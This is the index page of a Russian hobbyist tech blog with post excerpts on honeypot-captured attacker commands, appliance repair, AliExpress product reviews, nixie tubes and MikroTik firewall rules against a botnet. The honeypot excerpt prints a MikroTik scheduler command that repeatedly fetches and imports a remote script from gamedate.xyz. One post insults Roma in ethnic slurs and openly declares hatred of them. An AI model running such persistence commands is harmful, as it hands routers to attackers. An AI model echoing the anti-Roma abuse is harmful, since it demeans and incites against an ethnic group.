Перехваченные комманды хацкеров в FAKE SSH Honeypot cowrie

ХАЦКЕРЫ

Это перехваченные команды хацкеров через HONEYPOT COWRIE

ВВДИТЬ И ИСПОЛНЯТЬ ИХ НЕЛЬЗЯ! Ну если только очень хочется.)
перехват хакерских комманд через эмулятор терминала SSH
Перехват хакерских команд через эмулятор терминала SSH cowrie honeypot.

Микротиковский замес
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://gamedate.xyz/poll/b94cc680-52b5-4c5a-92f0-37f0a1307729 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write,1


и далее
Читать дальше

Обнинские цЫгаНЕ

Blog by Mikro
2 фото
Цыганские Обнинские отродья скрутили накладки моста
image
Цыганские обезъяны в Обнинские скрутили почти все металлические накладки на надземном пешеходном переходе в районе Мишково. Много раз видел прям среди бело дня как эти отродия скручивают по листу и тащат в сторону своего отвратительного места самозахвата. Мост сделан из дерева, нарушение конструкции приводит к скорому износу и опасности конструкции.
Ненавижу блядь цыган©!

Neff - перестал работать сенсор на варочной панели T66TS61N0

РЕМОНТ и разборка
В ремонт попала Индукционная варочная панель NEFF T66TS61N0.
ремонт сенсора модели Встраиваемая Neff T66TS6RN0 Home Connect
Особенности модели
Встраиваемая
Цвет: черный
Ширина встраивания: 60 см
Количество зон нагрева: 4
Функция PanBoost
Управление TwistPad® Fire с таймером
Функция увеличения мощности PotBoost
Функция PowerMove
FlexZone
Зона FlexInduction
17 ступеней мощности
Мощность подключения: 7,4 кВт
Размеры прибора (ВxШxГ): 63,3 мм х 606 мм х 546 мм
Производитель: Испания

Модель снята с производства

Последователь: Neff T66TS6RN0 Home Connect

— — — и что с ней?

Особенность неисправности это перестал работать сенсор включения питания.


При сильном и долгом нажатии на сенсорную кнопку варочная панель T66TS61N0 включалась и работала.
Проблема прогрессировала с момента окончания гарантии NEFF.
Странно!

Читать дальше

Псевдоновый жесткий диск с алиэкспрес (TOSHIBA ОТЗЫВ)

На али существует магазин FIGHTING NATION Computer Store торгующий всякой электроникой для ПК, клавиатуры мышки и прочая ерунда.
Среди ассортимента есть интересная позиция.
Жесткий Диск TOSHIBA 2 ТБ, для бизнеса,SATA III 7200 об/мин 128 МБ Кэш 3,5 24/7 для DVR NVR видеонаблюдения
Вобщем энтерпрайз, значит можно использовать и в серваке.
Вот так выглядит. Цена около 4500р +- курс и распродажи.

Новые жесткие диски с алиэкспрес, не новые БУ

Читать дальше

Псевдо LED телевизор Exmork ОТЗЫВ! Осторожно!

Blog by Mikro
Около года назад один знакомый купил себе телевизор(так назовём ЭТО) 12 вольт для просмотра цифры и для дома и для загородных поездок на авто(12 вольт однако, прям от прикуривателя)))).
Фирма этого устройства на сайте указана была Exmork.
Нашёл в Интернете якобы подходящий, достаточно дорогой вариант для китая. Забирать поехал со склада в городе ТУЛА.
Выглядит этот склад-завот так Exmork телефизоры ОСТОРОЖНО!
Читать дальше

Газоразрядные индикаторные лампы nixie и проблема изоляции проводников

Разное в электронике
Есть уникальный человек Dalibor Farný который создаёт газоразрядные индикаторы.
Nixie Tube & Clock Manufacturer.
Его канал в ютубе
www.youtube.com/channel/UC0IY1BQiMehWMvezqWLyk4g
Тут он запарился сиянием проводников идущих к индикатору внутри газоразрядной лампы в PROJECT H(x).
И правильно он сделал что начал искать ответ. Ибо сияние это не есть хорошо. Свечение в газоразрядных индикаторах должно быть там где оно должно быть.

газоразрядные лампы горит проводник
Читать дальше

Новые атаки GRE на VPN Микротик (pptp l2tp)

ХАЦКЕРЫ
Ботнет 92.63.194.0/24 GRE
Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24
Что он делает?
Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.
впн микротик атаки GRE
Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157
Что делать?
Сперва добавлять нижеприведённые правила и шиться последней прошивкой.
/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist